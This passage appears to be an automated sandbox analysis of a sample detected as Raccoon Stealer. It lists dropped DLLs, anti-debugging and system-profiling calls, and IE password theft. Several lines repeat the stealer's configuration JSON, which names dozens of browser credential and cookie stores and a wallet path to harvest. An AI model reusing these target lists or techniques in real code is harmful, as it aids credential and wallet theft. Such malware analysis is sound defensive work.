Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll	Jump to dropped file

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: 0_2_001F7819 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,

0_2_001F7819

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: 0_2_001FEFDD FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,

0_2_001FEFDD

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior

Source: eLZzxG56uH.exe, 00000000.00000002.314134323.00000000016DE000.00000004.00000020.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: 0_2_0021C559 IsDebuggerPresent,OutputDebugStringW,

0_2_0021C559

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: 0_2_001F49A2 LoadLibraryA,GetProcAddress,FreeLibrary,

0_2_001F49A2

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_0021A03D mov eax, dword ptr fs:[00000030h]	0_2_0021A03D
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_0021A0B2 mov eax, dword ptr fs:[00000030h]	0_2_0021A0B2
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_0021A081 mov eax, dword ptr fs:[00000030h]	0_2_0021A081
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_00206C01 mov eax, dword ptr fs:[00000030h]	0_2_00206C01

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_00206625 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00206625
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: 0_2_00200EDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_00200EDC

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK

Jump to behavior

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,	0_2_001F7819
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: GetLocaleInfoW,	0_2_002229F7
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00222B1D
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: GetLocaleInfoW,	0_2_00218BA4
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_00222391
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: GetLocaleInfoW,	0_2_00222C23
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00222CF2
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: EnumSystemLocalesW,	0_2_00218577
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: GetLocaleInfoW,	0_2_0022258C
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: EnumSystemLocalesW,	0_2_00222633
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: EnumSystemLocalesW,	0_2_0022267E
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Code function: EnumSystemLocalesW,	0_2_00222719

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: 0_2_001FE03E GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

0_2_001FE03E

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: 0_2_001F71FA __EH_prolog,GetUserNameA,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor,

0_2_001F71FA

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: 0_2_001EA2F9 GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary,

0_2_001EA2F9

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

0_2_001F7819

Stealing of Sensitive Information:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 0.2.eLZzxG56uH.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eLZzxG56uH.exe PID: 3340, type: MEMORYSTR

Contains functionality to steal Internet Explorer form passwords

Show sources

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2

0_2_001F592B

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: eLZzxG56uH.exe, 00000000.00000002.314083739.00000000016B1000.00000004.00000020.sdmp	String found in binary or memory: {"_id":"-pEuK3wB3dP17SpzG6pB","au":"/l/f/-pEuK3wB3dP17SpzG6pB/21cbbf099c71cc43b2b903c1329c99a4ee8b02a9","ls":"/l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6f","ip":"84.17.52.39","location":{"country":"Switzerland","country_code":"CH","state":"Zurich","state_code":"ZH","city":"Zurich","zip":8152,"latitude":47.4317,"longitude":8.5759},"c":{"m":null,"t":null,"lu":null},"lu":null,"rm":1,"is_screen_enabled":1,"is_history_enabled":0,"depth":3,"s":[{"k":"edge","v":"28;Microsoft Edge;\\Microsoft\\Edge\\User Data;Login Data;Cookies;Web Data"},{"k":"chrome","v":"28;Google Chrome;\\Google\\Chrome\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeBeta","v":"28;Google Chrome Beta;\\Google\\Chrome Beta\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeSxS","v":"28;Google Chrome SxS;\\Google\\Chrome SxS\\User Data;Login Data;Cookies;Web Data"},{"k":"chromium","v":"28;Chromium;\\Chromium\\User Data;Login Data;Cookies;Web Data"},{"k":"xpom","v":"28;Xpom;\\Xpom\\User Data;Login Data;Cookies;Web Data"},{"k":"comodo","v":"28;Comodo Dragon;\\Comodo\\Dragon\\User Data;Login Data;Cookies;Web Data"},{"k":"amigo","v":"28;Amigo;\\Amigo\\User Data;Login Data;Cookies;Web Data"},{"k":"orbitum","v":"28;Orbitum;\\Orbitum\\User Data;Login Data;Cookies;Web Data"},{"k":"bromium","v":"28;Bromium;\\Bromium\\User Data;Login Data;Cookies;Web Data"},{"k":"brave","v":"28;Brave;\\BraveSoftware\\Brave-Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"nichrome","v":"28;Nichrome;\\Nichrome\\User Data;Login Data;Cookies;Web Data"},{"k":"rockmelt","v":"28;RockMelt;\\RockMelt\\User Data;Login Data;Cookies;Web Data"},{"k":"360browser","v":"28;360Browser;\\360Browser\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"vivaldi","v":"28;Vivaldi;\\Vivaldi\\User Data;Login Data;Cookies;Web Data"},{"k":"go","v":"28;Go;\\Go!\\User Data;Login Data;Cookies;Web Data"},{"k":"sputnik","v":"28;Sputnik;\\Sputnik\\Sputnik\\User Data;Login Data;Cookies;Web Data"},{"k":"kometa","v":"28;Kometa;\\Kometa\\User Data;Login Data;Cookies;Web Data"},{"k":"uran","v":"28;Uran;\\uCozMedia\\Uran\\User Data;Login Data;Cookies;Web Data"},{"k":"qipSurf","v":"28;QIP Surf;\\QIP Surf\\User Data;Login Data;Cookies;Web Data"},{"k":"epicprivacy","v":"28;Epic Privacy;\\Epic Privacy Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"coccoc","v":"28;CocCoc;\\CocCoc\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"centbrowser","v":"28;CentBrowser;\\CentBrowser\\User Data;Login Data;Cookies;Web Data"},{"k":"7star","v":"28;7Star;\\7Star\\7Star\\User Data;Login Data;Cookies;Web Data"},{"k":"elements","v":"28;Elements;\\Elements Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"torbro","v":"28;TorBro;\\TorBro\\Profile;Login Data;Cookies;Web Data"},{"k":"suhba","v":"28;Suhba;\\Suhba\\User Data;Login Data;Cookies;Web Data"},{"k":"saferbrowser","v":"28;Safer Browser;\\Safer Technologies\\Secure Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"mustang","v":"28;Mustang;\\Rafotech\\Mustang
Source: eLZzxG56uH.exe, 00000000.00000002.314083739.00000000016B1000.00000004.00000020.sdmp	String found in binary or memory: {"_id":"-pEuK3wB3dP17SpzG6pB","au":"/l/f/-pEuK3wB3dP17SpzG6pB/21cbbf099c71cc43b2b903c1329c99a4ee8b02a9","ls":"/l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6f","ip":"84.17.52.39","location":{"country":"Switzerland","country_code":"CH","state":"Zurich","state_code":"ZH","city":"Zurich","zip":8152,"latitude":47.4317,"longitude":8.5759},"c":{"m":null,"t":null,"lu":null},"lu":null,"rm":1,"is_screen_enabled":1,"is_history_enabled":0,"depth":3,"s":[{"k":"edge","v":"28;Microsoft Edge;\\Microsoft\\Edge\\User Data;Login Data;Cookies;Web Data"},{"k":"chrome","v":"28;Google Chrome;\\Google\\Chrome\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeBeta","v":"28;Google Chrome Beta;\\Google\\Chrome Beta\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeSxS","v":"28;Google Chrome SxS;\\Google\\Chrome SxS\\User Data;Login Data;Cookies;Web Data"},{"k":"chromium","v":"28;Chromium;\\Chromium\\User Data;Login Data;Cookies;Web Data"},{"k":"xpom","v":"28;Xpom;\\Xpom\\User Data;Login Data;Cookies;Web Data"},{"k":"comodo","v":"28;Comodo Dragon;\\Comodo\\Dragon\\User Data;Login Data;Cookies;Web Data"},{"k":"amigo","v":"28;Amigo;\\Amigo\\User Data;Login Data;Cookies;Web Data"},{"k":"orbitum","v":"28;Orbitum;\\Orbitum\\User Data;Login Data;Cookies;Web Data"},{"k":"bromium","v":"28;Bromium;\\Bromium\\User Data;Login Data;Cookies;Web Data"},{"k":"brave","v":"28;Brave;\\BraveSoftware\\Brave-Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"nichrome","v":"28;Nichrome;\\Nichrome\\User Data;Login Data;Cookies;Web Data"},{"k":"rockmelt","v":"28;RockMelt;\\RockMelt\\User Data;Login Data;Cookies;Web Data"},{"k":"360browser","v":"28;360Browser;\\360Browser\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"vivaldi","v":"28;Vivaldi;\\Vivaldi\\User Data;Login Data;Cookies;Web Data"},{"k":"go","v":"28;Go;\\Go!\\User Data;Login Data;Cookies;Web Data"},{"k":"sputnik","v":"28;Sputnik;\\Sputnik\\Sputnik\\User Data;Login Data;Cookies;Web Data"},{"k":"kometa","v":"28;Kometa;\\Kometa\\User Data;Login Data;Cookies;Web Data"},{"k":"uran","v":"28;Uran;\\uCozMedia\\Uran\\User Data;Login Data;Cookies;Web Data"},{"k":"qipSurf","v":"28;QIP Surf;\\QIP Surf\\User Data;Login Data;Cookies;Web Data"},{"k":"epicprivacy","v":"28;Epic Privacy;\\Epic Privacy Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"coccoc","v":"28;CocCoc;\\CocCoc\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"centbrowser","v":"28;CentBrowser;\\CentBrowser\\User Data;Login Data;Cookies;Web Data"},{"k":"7star","v":"28;7Star;\\7Star\\7Star\\User Data;Login Data;Cookies;Web Data"},{"k":"elements","v":"28;Elements;\\Elements Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"torbro","v":"28;TorBro;\\TorBro\\Profile;Login Data;Cookies;Web Data"},{"k":"suhba","v":"28;Suhba;\\Suhba\\User Data;Login Data;Cookies;Web Data"},{"k":"saferbrowser","v":"28;Safer Browser;\\Safer Technologies\\Secure Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"mustang","v":"28;Mustang;\\Rafotech\\Mustang
Source: eLZzxG56uH.exe, 00000000.00000002.314083739.00000000016B1000.00000004.00000020.sdmp	String found in binary or memory: {"_id":"-pEuK3wB3dP17SpzG6pB","au":"/l/f/-pEuK3wB3dP17SpzG6pB/21cbbf099c71cc43b2b903c1329c99a4ee8b02a9","ls":"/l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6f","ip":"84.17.52.39","location":{"country":"Switzerland","country_code":"CH","state":"Zurich","state_code":"ZH","city":"Zurich","zip":8152,"latitude":47.4317,"longitude":8.5759},"c":{"m":null,"t":null,"lu":null},"lu":null,"rm":1,"is_screen_enabled":1,"is_history_enabled":0,"depth":3,"s":[{"k":"edge","v":"28;Microsoft Edge;\\Microsoft\\Edge\\User Data;Login Data;Cookies;Web Data"},{"k":"chrome","v":"28;Google Chrome;\\Google\\Chrome\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeBeta","v":"28;Google Chrome Beta;\\Google\\Chrome Beta\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeSxS","v":"28;Google Chrome SxS;\\Google\\Chrome SxS\\User Data;Login Data;Cookies;Web Data"},{"k":"chromium","v":"28;Chromium;\\Chromium\\User Data;Login Data;Cookies;Web Data"},{"k":"xpom","v":"28;Xpom;\\Xpom\\User Data;Login Data;Cookies;Web Data"},{"k":"comodo","v":"28;Comodo Dragon;\\Comodo\\Dragon\\User Data;Login Data;Cookies;Web Data"},{"k":"amigo","v":"28;Amigo;\\Amigo\\User Data;Login Data;Cookies;Web Data"},{"k":"orbitum","v":"28;Orbitum;\\Orbitum\\User Data;Login Data;Cookies;Web Data"},{"k":"bromium","v":"28;Bromium;\\Bromium\\User Data;Login Data;Cookies;Web Data"},{"k":"brave","v":"28;Brave;\\BraveSoftware\\Brave-Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"nichrome","v":"28;Nichrome;\\Nichrome\\User Data;Login Data;Cookies;Web Data"},{"k":"rockmelt","v":"28;RockMelt;\\RockMelt\\User Data;Login Data;Cookies;Web Data"},{"k":"360browser","v":"28;360Browser;\\360Browser\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"vivaldi","v":"28;Vivaldi;\\Vivaldi\\User Data;Login Data;Cookies;Web Data"},{"k":"go","v":"28;Go;\\Go!\\User Data;Login Data;Cookies;Web Data"},{"k":"sputnik","v":"28;Sputnik;\\Sputnik\\Sputnik\\User Data;Login Data;Cookies;Web Data"},{"k":"kometa","v":"28;Kometa;\\Kometa\\User Data;Login Data;Cookies;Web Data"},{"k":"uran","v":"28;Uran;\\uCozMedia\\Uran\\User Data;Login Data;Cookies;Web Data"},{"k":"qipSurf","v":"28;QIP Surf;\\QIP Surf\\User Data;Login Data;Cookies;Web Data"},{"k":"epicprivacy","v":"28;Epic Privacy;\\Epic Privacy Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"coccoc","v":"28;CocCoc;\\CocCoc\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"centbrowser","v":"28;CentBrowser;\\CentBrowser\\User Data;Login Data;Cookies;Web Data"},{"k":"7star","v":"28;7Star;\\7Star\\7Star\\User Data;Login Data;Cookies;Web Data"},{"k":"elements","v":"28;Elements;\\Elements Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"torbro","v":"28;TorBro;\\TorBro\\Profile;Login Data;Cookies;Web Data"},{"k":"suhba","v":"28;Suhba;\\Suhba\\User Data;Login Data;Cookies;Web Data"},{"k":"saferbrowser","v":"28;Safer Browser;\\Safer Technologies\\Secure Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"mustang","v":"28;Mustang;\\Rafotech\\Mustang
Source: eLZzxG56uH.exe, 00000000.00000002.314121729.00000000016D2000.00000004.00000020.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: eLZzxG56uH.exe, 00000000.00000002.314083739.00000000016B1000.00000004.00000020.sdmp	String found in binary or memory: {"_id":"-pEuK3wB3dP17SpzG6pB","au":"/l/f/-pEuK3wB3dP17SpzG6pB/21cbbf099c71cc43b2b903c1329c99a4ee8b02a9","ls":"/l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6f","ip":"84.17.52.39","location":{"country":"Switzerland","country_code":"CH","state":"Zurich","state_code":"ZH","city":"Zurich","zip":8152,"latitude":47.4317,"longitude":8.5759},"c":{"m":null,"t":null,"lu":null},"lu":null,"rm":1,"is_screen_enabled":1,"is_history_enabled":0,"depth":3,"s":[{"k":"edge","v":"28;Microsoft Edge;\\Microsoft\\Edge\\User Data;Login Data;Cookies;Web Data"},{"k":"chrome","v":"28;Google Chrome;\\Google\\Chrome\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeBeta","v":"28;Google Chrome Beta;\\Google\\Chrome Beta\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeSxS","v":"28;Google Chrome SxS;\\Google\\Chrome SxS\\User Data;Login Data;Cookies;Web Data"},{"k":"chromium","v":"28;Chromium;\\Chromium\\User Data;Login Data;Cookies;Web Data"},{"k":"xpom","v":"28;Xpom;\\Xpom\\User Data;Login Data;Cookies;Web Data"},{"k":"comodo","v":"28;Comodo Dragon;\\Comodo\\Dragon\\User Data;Login Data;Cookies;Web 